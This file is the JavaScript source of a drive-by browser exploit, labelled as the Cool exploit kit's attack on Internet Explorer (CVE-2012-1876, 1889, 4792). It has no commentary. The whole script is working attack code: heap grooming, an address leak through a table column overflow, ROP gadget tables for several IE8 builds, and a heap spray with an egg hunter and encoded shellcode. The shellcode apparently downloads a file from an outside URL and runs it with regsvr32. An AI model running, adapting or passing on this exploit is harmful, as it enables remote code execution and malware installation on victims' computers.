Cool EK CVE-2012 1876 & 1889 & 4792

1. <script type='text/javascript'>
2. function heapLib() {}
3. heapLib.ie = function(m) {
4. this.pd = "%u0c0c%u0c0c";
5. while (4 + this.pd.length*2 + 2 < this.m) {
6. this.pd += this.pd;
7. }
8. this.me = new Array();
9. this.me["0"] = new Array();
10. this.me["1"] = new Array();
11. CollectGarbage();
12.  
13. this.hlFillbins();
14. };
15.  
16. heapLib.ie.prototype.hlFillbins = function() {
17. for (var i = 0; i < 6; i++) {
18. this.me["0"].push(this.pd.substr(0, (32-6)/2));
19. this.me["0"].push(this.pd.substr(0, (64-6)/2));
20. this.me["0"].push(this.pd.substr(0, (256-6)/2));
21. this.me["0"].push(this.pd.substr(0, (32768-6)/2));
22. }
23. };
24.  
25. heapLib.ie.prototype.heapLib_alloc = function(a) {
26. if (typeof a == "string" || a instanceof String) {
27. this.me["1"].push(a.substr(0, a.length));
28. }
29. };
30.  
31. heapLib.ie.prototype.heapLib_GC = function() {
32. delete this.me["0"];
33. this.me["0"] = new Array();
34. CollectGarbage();
35. this.hlFillbins();
36. };
37.  
38. heapLib.ie.prototype.heapLib_release = function() {
39. delete this.me["1"];
40. delete this.me["0"];
41. CollectGarbage();
42. };
43.  
44. var heapObj = new heapLib.ie(0x20000);
45.  
46. var ropGadgets;
47.  
48. var ropGadgetsTable_IE8 = new Array(
49. new Array(0xAE08, 0x0, 0x1FAE08, 0x2E4E3, 0x5C4B, 0x5C4A, 0x1318, 0x3F7FB, 0x25B84),
50. new Array(0x80C8, 0, 0x2080C8, 0x2CE36, 0x4E65, 0x4E64, 0x1340, 0x3F3CF, 0x62B0),
51. new Array(0x7A98, 0, 0x207A98, 0x2D00E, 0x4EA9, 0x4EA8, 0x137C, 0x3F54D, 0x1E924),
52. new Array(0x7B58, 0, 0x207B58, 0x2D05E, 0x4EA9, 0x4EA8, 0x137C, 0x3F5ED, 0x1E914),
53. new Array(0x7FC8, 0x8160, 0x207FC8, 0x2D314, 0x4EA1, 0x4EA0, 0x137C, 0x3F8F3, 0x1E9A4),
54. new Array(0x7DF8, 0x7F90, 0x207DF8, 0x2D174, 0x4EA1, 0x4EA0, 0x137C, 0x3F703, 0x1E804),
55. new Array(0x7DF8, 0x7F98, 0x207DF8, 0x2D20C, 0x4EC1, 0x4EC0, 0x1368, 0x3F677, 0x1E844),
56. new Array(0x7DD8, 0x0, 0x207DD8, 0x176C, 0x4ED9, 0x4ED8, 0x1374, 0x3F6D7, 0x13739),
57. new Array(0x7EF8, 0x8090, 0x207EF8, 0x2CDD6, 0x4E65, 0x4E64, 0x1340, 0x3F39F, 0x1E844),
58. new Array(0x7BB8, 0x7D58, 0x207BB8, 0x2D170, 0x4EA1, 0x4EA0, 0x1368, 0x3F5F7, 0x1E7E4),
59. new Array(0x7F58, 0x80F8, 0x207F58, 0x2D190, 0x4EA1, 0x4EA0, 0x1368, 0x3F637, 0x91C5F),
60. new Array(0x3AF8, 0x0, 0x173AF8, 0x117EF, 0x1148E, 0x1148D, 0x1308, 0x9F5C9, 0x2D7FE),
61. new Array(0x3930, 0x3AC8, 0x173930, 0x118FF, 0x1159E, 0x1159D, 0x134C, 0x9F4D1, 0x2D83E),
62. new Array(0x3A70, 0x3C10, 0x173A70, 0x1191B, 0x115BA, 0x115B9, 0x133C, 0x9F661, 0x2D8DE),
63. new Array(0x8668, 0x8800, 0x158668, 0x1B44B, 0x14F08, 0x14F07, 0x1348, 0x6F0EB, 0x2CCAE),
64. new Array(0x8628, 0x87C0, 0x158628, 0x1B4EF, 0x14FA8, 0x14FA7, 0x134C, 0x6F1DB, 0x2CDEE),
65. new Array(0x8528, 0x86C0, 0x158528, 0x1B4EF, 0x14FA8, 0x14FA7, 0x134C, 0x6F0DB, 0x2CDAE),
66. new Array(0x82D8, 0x8478, 0x1582D8, 0x1B4E3, 0x14F88, 0x14F87, 0x133C, 0x6EFC3, 0x2CD96)
67. );
68.  
69. var fillbuff = new Array();
70.  
71. function randString(p, s)
72. {
73. var r1=Math.floor(Math.random()*90)+10;
74. var r2=Math.floor(Math.random()*90)+10;
75. var r3=Math.floor(Math.random()*90)+10;
76. var r4=Math.floor(Math.random()*90)+10;
77.  
78. var ps = "%u" + r1.toString() + r2.toString()
79. ps += "%u" + r3.toString() + r4.toString()
80.  
81. var pa = unescape(ps);
82.  
83. while (pa.length < s) pa+= pa;
84.  
85. pa = p + pa.substr(0, s - p.length);
86. return pa;
87. }
88. function LoadIeColSpan() {
89. var div_container = document.getElementById("heap_allign");
90. div_container.style.cssText = "display:none";
91. // VIPOLNYAT ODNIM KUSKOM
92. for (var i = 0; i < 4000; i += 4) {
93. fillbuff[i] = randString('', 125);
94. fillbuff[i+1] = randString('', 125);
95. fillbuff[i+2] = randString('', 125);
96. fillbuff[i+3] = document.createElement("button");
97. div_container.appendChild(fillbuff[i+3]);
98. }
99.  
100. for (var i = 0; i < 4000; i += 4) {
101. fillbuff[i] = null;
102. }
103. CollectGarbage();
104. // END VIPOLNYAT ODNIM KUSKOM
105. var oForTable = document.getElementById("table_div");
106. oForTable.width = "51px";
107. oForTable.style.width = "51px";
108. oForTable.style.height = "1px";
109. oForTable.style.overflow = "auto";
110.  
111. var oTable = document.createElement("table");
112. oTable.style.tableLayout = "fixed";
113. oTable.style.visibility = "visible";
114. oTable.width = "51";
115. oTable.height = "1";
116. oForTable.appendChild(oTable);
117.  
118. var oRow = oTable.insertRow();
119.  
120.  
121. var oColGroup = document.createElement("COLGROUP");
122. oColGroup.width = "1px";
123. oTable.appendChild(oColGroup);
124.  
125. var oCol = document.createElement("COL");
126. oCol.id = "table_col_id";
127. oCol.width = "41";
128. oCol.height = "1";
129. oCol.span = "9";
130.  
131. oColGroup.appendChild(oCol);
132.  
133. var oCell = oRow.insertCell();
134. oCell.innerHTML = " ";
135. var oTbody = document.createElement("TBODY");
136.  
137. CollectGarbage();
138.  
139. setTimeout(function(){overwrite()}, 500);
140. }
141.  
142. var sprayContaner = new Array();
143.  
144. function toUnescape(k) {
145. return String.fromCharCode(k & 0xFFFF, k >> 16);
146. }
147.  
148.  
149. function heap_spray(r) {
150. shellcode = unescape("%u8366%ufce4%u85fc%u75e4%ue934%u335f%u64c0%u408b%u8b30%u0c40%u708b%u561c%u768b%u3308%u66db%u5e8b%u033c%u3374%u812c%u15ee%uff10%ub8ff%u408b%uc330%u3946%u7506%u87fb%u2434%ue485%u5175%uebe9%u514c%u8b56%u3c75%u748b%u7835%uf503%u8b56%u2076%uf503%uc933%u4149%uadfc%uc503%udb33%ube0f%u3810%u74f2%uc108%u0dcb%uda03%ueb40%u3bf1%u751f%u5ee6%u5e8b%u0324%u66dd%u0c8b%u8d4b%uec46%u54ff%u0c24%ud88b%udd03%u048b%u038b%uabc5%u595e%uebc3%uad53%u688b%u8020%u0c7d%u7433%u9603%uf3eb%u688b%u8b08%u6af7%u5905%u98e8%uffff%ue2ff%ue8f9%u0000%u0000%u5058%u406a%uff68%u0000%u5000%uc083%u5019%u8b55%u8bec%u105e%uc383%uff05%u68e3%u6e6f%u0000%u7568%u6c72%u546d%u16ff%uc483%u8b08%ue8e8%uff61%uffff%u02eb%u72eb%uec81%u0104%u0000%u5c8d%u0c24%u04c7%u7224%u6765%uc773%u2444%u7604%u3372%uc732%u2444%u2008%u732d%u5320%uf868%u0000%uff00%u0c56%ue88b%uc933%uc751%u1d44%u7700%u6270%uc774%u1d44%u2e05%u6c64%uc66c%u1d44%u0009%u8a59%u04c1%u8830%u1d44%u4104%u6a51%u6a00%u5300%u6a57%uff00%u1456%uc085%u1675%u006a%uff53%u0456%u006a%ueb83%u530c%u56ff%u8304%u0cc3%u02eb%u13eb%u8047%u003f%ufa75%u8047%u003f%uc475%u006a%ufe6a%u56ff%ue808%ufe9c%uffff%u4e8e%uec0e%ufe98%u0e8a%u6f89%ubd01%uca33%u5b8a%uc61b%u7946%u1a36%u702f%u7468%u7074%u2f3a%u352f%u3031%u6232%u3735%u3833%u3639%u6137%u612e%u6d64%u6e69%u7268%u6573%u7672%u6369%u7365%u6f2e%u6772%u6e2f%u7765%u2f73%u6970%u7363%u6e2f%u7765%u702e%u676e%u0000");
151.  
152. var eghunter = unescape("%uE485%u3575%u5FE9%uC033%u8B64%u3040%u408B%u8B0C%u1C70%u56FC%u768B%u3308%u66DB%u5E8B%u033C%u3374%u812C%u15EE%uFF10%uB8FF%u408B%uC330%u3946%u7506%u87FB%u2434%uE485%u5075%uEBE9%u514B%u8B56%u3C75%u748B%u7835%uF503%u8B56%u2076%uF503%uC933%u4149%u03AD%u33C5%u0FDB%u10BE%uF238%u0874%uCBC1%u030D%u40DA%uF1EB%u1F3B%uE775%u8B5E%u245E%uDD03%u8B66%u4B0C%u468D%uFFEC%u2454%u8B0C%u03D8%u8BDD%u8B04%uC503%u5EAB%uC359%u70EB%u8BAD%u2068%u7D80%u330C%u0374%uEB96%u8BF3%u0868%uF78B%u036A%uE859%uFF99%uFFFF%uF9E2%uC033%uB866%u001C%uE02B%uDC8B%uC933%u5951%uB966%uFFFF%u8141%uFFF9%uFFFF%u777F%u515C%u1C6A%u5153%u16FF%uC085%uE774%u7B81%u0010%u0010%u7500%u81DE%u187B%u0000%u0002%uD575%u7B83%u0414%uCF75%uC933%u07B1%u038B%u448B%u2488%u548B%u0C8E%uD03B%uBD75%uF0E2%u02EB%u25EB%uC68B%uC083%u500C%u406A%u438B%u500C%u438B%u5004%u56FF%u6404%u258B%u0000%u0000%u338B%uC683%uFF24%uFFE6%u0856%uE890%uFEE1%uFFFF%uC8AA%uA3C8%uC61B%u7946%uD87E%u73E2");
153. var token = shellcode.substr(0, 16);
154.  
155. var code = unescape("%ue02C%u105a");
156. code += toUnescape(ropGadgets[4]);
157. code += toUnescape(ropGadgets[5]);
158. code += toUnescape(ropGadgets[3]);
159. code += toUnescape(ropGadgets[4]);
160. code += toUnescape(ropGadgets[4]);
161. code += toUnescape(ropGadgets[5]);
162. code += toUnescape(ropGadgets[4]);
163. code += toUnescape(ropGadgets[5]);
164. code += toUnescape(ropGadgets[6]);
165. code += toUnescape(ropGadgets[7]);
166. code += toUnescape(ropGadgets[8]);
167. code += unescape("%uE06C%u105A");
168. code += unescape("%u0000%u105A");
169. code += unescape("%u0000%u0001");
170. code += unescape("%u0040%u0000");
171. code += unescape("%uE000%u105A");
172.  
173.  
174. code += eghunter;
175. code += token;
176.  
177. var nops = unescape("%uCCCC%uCCCC");
178.  
179.  
180. while (nops.length < 4096) nops += nops;
181. var junk_offset = nops.substring(0, 0x2);
182.  
183. var block = junk_offset + code + nops.substring(0, 4096 - code.length - junk_offset.length);
184.  
185. while (block.length < 100000) block += block;
186. while (shellcode.length < 100000) shellcode += shellcode;
187.  
188. var f = block.substring(0, 64*1024/2);
189. var a = shellcode.substring(0, 64*1024/2);
190.  
191. for (i=0; i<14; i++) {
192. f += block.substr(0, 64*1024/2);
193. }
194.  
195. f += block.substr(0, (60*1024/2)-(38/2));
196.  
197. for (i=0; i<14; i++) {
198. a += shellcode.substr(0, 64*1024/2);
199. }
200.  
201. a += shellcode.substr(0, (60*1024/2)-(38/2));
202.  
203. for (i=0; i < 400; i++) {
204. sprayContaner[i] = heapObj.heapLib_alloc(f);
205. }
206. for (i=400; i < 500; i++) {
207. sprayContaner[i] = heapObj.heapLib_alloc(a);
208. }
209. }
210.  
211. function overwrite() {
212.  
213. var oCol = document.getElementById("table_col_id");
214.  
215. if (oCol != null) {
216. oCol.width = "42765";
217. oCol.span = "19";
218. setTimeout(function(){findLeak()}, 500);
219. }
220.  
221. }
222.  
223. function findLeak() {
224. var leak_addr1 = -1;
225. var leak_addr2 = -1;
226. var leak_index = -1;
227.  
228. for (var i = 1; i < 4000; i += 4)
229. {
230. var offset = 0;
231.  
232. if (fillbuff[i].length > (0x100-6)/2)
233. {
234. leak_index = i;
235. offset = ((0x100-6)/2 + (2 + 8)/2) * 2 + 2;
236. leak_addr1 = fillbuff[leak_index].charCodeAt(offset) + (fillbuff[leak_index].charCodeAt(offset + 1) << 16);
237. leak_addr2 = fillbuff[leak_index].charCodeAt(offset + 6) + (fillbuff[leak_index].charCodeAt(offset + 7) << 16);
238.  
239. if (leak_addr1 == 0x430043) {
240. offset += 16;
241. leak_addr1 = fillbuff[leak_index].charCodeAt(offset) + (fillbuff[leak_index].charCodeAt(offset + 1) << 16);
242. leak_addr2 = fillbuff[leak_index].charCodeAt(offset + 6) + (fillbuff[leak_index].charCodeAt(offset + 7) << 16);
243. }
244. }
245.  
246. if (fillbuff[i + 1].length > (0x100-6)/2)
247. {
248. leak_index = i + 1;
249. offset = (0x100-6)/2 + (2 + 8)/2;
250. leak_addr1 = fillbuff[leak_index].charCodeAt(offset) + (fillbuff[leak_index].charCodeAt(offset + 1) << 16);
251. leak_addr2 = fillbuff[leak_index].charCodeAt(offset + 6) + (fillbuff[leak_index].charCodeAt(offset + 7) << 16);
252. }
253.  
254. if (leak_index != -1)
255. {
256.  
257. if (leak_addr1 < 0x100000) {
258. leak_addr1 = 0;
259. leak_index = -1;
260. break;
261. }
262.  
263. for (var i = 0; i < ropGadgetsTable_IE8.length; i++)
264. {
265. if (((leak_addr1 & 0xFFFF) == ropGadgetsTable_IE8[i][0]) &&
266. ((ropGadgetsTable_IE8[i][1] == 0x0) ||
267. ((leak_addr2 & 0xFFFF) == ropGadgetsTable_IE8[i][1])))
268. {
269. ropGadgets = ropGadgetsTable_IE8[i];
270. leak_addr1 -= ropGadgets[2];
271. break;
272. }
273. }
274.  
275. if (ropGadgets == null) {
276. leak_addr1 = 0;
277. leak_index = -1;
278. }
279.  
280. break;
281. }
282. }
283.  
284.  
285. if (leak_index != -1)
286. {
287. if (ropGadgets != null) {
288. for (var i = 0; i < ropGadgets.length; i++) {
289. ropGadgets[i] += leak_addr1;
290. }
291. }
292.  
293. heap_spray();
294.  
295. var obj = document.createElement("object");
296. obj.classid = "clsid:f6D90f11-9c73-11d3-b32e-00C04f990bb4";
297. document.body.appendChild(obj);
298.  
299. obj = obj.object;
300. var src = unescape("%ue028%u105a");
301.  
302. while (src.length < 0x1002) src += src;
303. src = "\\\\xxx" + src;
304. src = src.substr(0, 0x1000 - 10);
305. var pic = document.createElement("img");
306. pic.src = src;
307. pic.nameProp;
308. try {
309. obj.definition(0);
310. obj.definition(definition);
311. obj.definition;
312. } catch(e) { }
313.  
314. }
315.  
316. }
317.  
318. LoadIeColSpan();
319. </script>